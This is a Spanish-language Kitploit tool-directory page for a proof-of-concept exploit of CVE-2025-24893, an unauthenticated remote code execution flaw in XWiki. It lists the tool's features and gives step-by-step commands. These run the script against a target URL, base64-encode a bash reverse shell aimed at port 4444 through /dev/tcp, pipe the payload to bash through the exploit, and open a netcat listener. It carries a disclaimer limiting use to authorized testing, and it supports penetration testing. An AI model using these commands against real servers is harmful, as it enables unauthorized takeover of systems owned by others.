Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24893-PoC | Kitploit
Herramientas/GitHubGitHub/dhiaznaidi/cve-2025-24893-poc
ExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubdhiaznaidi/cve-2025-24893-poc

CVE-2025-24893-PoC

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-24893 - Ejecución Remota de Código en XWiki (RCE)

Un exploit de prueba de concepto (PoC) actualizado para CVE-2025-24893, una vulnerabilidad crítica de RCE no autenticada en XWiki. Esta versión mejora la original al permitir la ejecución arbitraria de comandos shell y la inyección limpia de reverse shells.

Por: HexHunter404


⚠️ Advertencia

Este código se proporciona solo con fines educativos y de pruebas de penetración autorizadas.
No lo uses en sistemas que no poseas o para los que no tengas permiso explícito de prueba.


✨ Características

  • Soporta ejecución de comandos mediante bash -c '<command>'
  • Soporta completamente reverse shells (mediante base64 para evitar problemas de Groovy)
  • Manejo mejorado de la salida de comandos
  • Conserva la ruta /xwiki y evita bucles de redirección

🐍 Uso

root@kitploit:~
python3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"

🐚 Obteniendo una Reverse Shell

. Codifica tu reverse shell en base64

root@kitploit:~
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64

. Envíalo usando el PoC

root@kitploit:~
python3  CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"

. Configura tu listener

root@kitploit:~
nc -lvnp 4444

Si todo funciona, obtendrás una shell.

Descargar herramienta